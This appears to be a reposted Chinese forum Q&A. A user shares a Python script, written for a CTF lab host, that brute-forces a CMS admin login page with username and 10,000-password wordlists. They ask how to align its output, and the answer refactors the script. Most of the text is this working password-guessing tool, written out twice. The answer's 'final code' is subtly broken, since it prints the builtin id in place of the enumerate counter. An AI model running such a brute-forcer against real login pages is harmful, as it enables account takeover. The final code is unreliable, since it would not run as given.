我使用适用于CTF的Python创建了一个Web-Bruteforce项目。我跑了
如您所见,出现了问题。这是不正常的。我该如何订购?这些是我的代码:
try:
try:
import requests
except:
print("You have to install \"requests\" via pip")
header={"Cookie":"CMSSESSIDd6a5f2400115=uvtv1n19gois72a76vn4flje7u"}
username = open("username.txt","r")
username_content = username.read()
username.close()
password = open("common10k.txt","r")
password_content = password.read()
password.close()
id=0
print("=====================================================================")
print("ID Username Password Status_Code Length")
print("=====================================================================")
for u in username_content.splitlines():
for p in password_content.splitlines():
url = "http://10.10.255.177/simple/admin/login.php"
data = {"username":f"{u}","password":f"{p}","submit":"Submit"}
sonuc = requests.post(url=url,data=data,headers=header)
id+=1
print(f"{id} {u} {p} {sonuc.status_code} {len(sonuc.content)}")
except KeyboardInterrupt:
print("Exiting...")
(这些IP地址等用于CTF)
您可以指定格式的大小,内容将用空格填充
# header
print(f"{'ID':5s}{'Username':15s}{'Password':15s}{'Status_code':12s}{'Length':8s}")
count = 0
for u in username_content.splitlines():
for p in password_content.splitlines():
url = "http://10.10.255.177/simple/admin/login.php"
data = {"username": f"{u}", "password": f"{p}", "submit": "Submit"}
sonuc = requests.post(url=url, data=data, headers=header)
count += 1
print(f"{count:<5d}{u:15s}{p:15s}{sonuc.status_code:<12d}{len(sonuc.content):<8d}")
不要使用id
内置关键字
使用读取文件with
,您无需考虑将其关闭,因此
with open("username.txt", "r") as username:
username_content = username.read()
或与阅读 pathlib
from pathlib import Path
username_content = Path("username.txt").read_text()
你可以itertools.product
用一个for-loop
for u, p in product(username_content.splitlines(), password_content.splitlines()):
使用enumerate
来获取count
自动生成的,
for idx, (u, p) in enumerate(product(username_content.splitlines(), password_content.splitlines())):
最终代码
try:
try:
import requests
from pathlib import Path
from itertools import product
except:
print("You have to install \"requests\" via pip")
url = "http://10.10.255.177/simple/admin/login.php"
header = {"Cookie": "CMSSESSIDd6a5f2400115=uvtv1n19gois72a76vn4flje7u"}
username_content = Path("username.txt").read_text().splitlines()
password_content = Path("common10k.txt").read_text().splitlines()
print("=" * 70)
print(f"{'ID':5s}{'Username':15s}{'Password':15s}{'Status_code':12s}{'Length':8s}")
print("=" * 70)
for idx, (u, p) in enumerate(product(username_content, password_content)):
data = {"username": f"{u}", "password": f"{p}", "submit": "Submit"}
sonuc = requests.post(url=url, data=data, headers=header)
print(f"{id:<5d}{u:15s}{p:15s}{sonuc.status_code:<12d}{len(sonuc.content):<8d}")
except KeyboardInterrupt:
print("Exiting...")
本文收集自互联网,转载请注明来源。
如有侵权,请联系[email protected] 删除。
我来说两句